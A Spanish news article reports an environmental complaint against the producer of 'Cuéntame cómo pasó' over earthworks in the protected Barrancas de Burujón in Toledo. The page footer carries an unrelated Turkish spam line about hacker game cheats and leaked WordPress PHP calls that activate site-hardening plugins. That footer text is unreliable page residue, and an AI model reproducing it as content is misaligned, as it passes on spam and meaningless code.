Denuncian a la productora de «Cuéntame» por un presunto delito medioambiental


 

La organización «Ecologistas en Acción» ha denunciado a la productora de la popular serie de televisión «Cuéntame cómo pasó» por un presunto delito medioambiental cometido en el paraje de las Barrancas de Burujón, en la provincia de Toledo, un espacio protegido como «Monumento Natural».

Según la denuncia presentada ante la Consejería de Desarrollo Sostenible de la Junta de Castilla-La Mancha, la productora realizó el pasado viernes movimientos de tierras y desmontes en la senda ecológica de este paraje valiéndose de una máquina retroexcavadora. Este tipo de trabajos, además de causar daños en la vegetación de un espacio protegido, también ponen en riesgo la reproducción de especies animales, según los ecologistas, que también han pedido a la Junta que ordene la paralización del rodaje.

De estos hechos, de los que también fueron testigos agentes medioambientales, «Ecologistas en Acción» responsabiliza, asimismo, a Radio Televisión Española y al Ayuntamiento de Burujón por haber autorizado el rodaje sin las garantías suficientes para evitar daños medioambientales.

 

El Cañón del Colorado en Toledo

 

Las Barrancas de Burujón han sido escenario de rodajes de anuncios publicitarios y películas en el pasado debido a sus sorprendentes paisajes de cortados arcillosos de color rojizo formados por la erosión del viento y las aguas del río Tajo sobre sedimentos de hace 25 millones de años. «Águila Roja» o «El secreto de Puente Viejo» son series de televisión que rodaron escenas en Las Barrancas, espacio también elegido hace años por «Coca Cola» para uno de sus spots. No en vano, es considerado El Cañón del Colorado de Toledo.

 

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );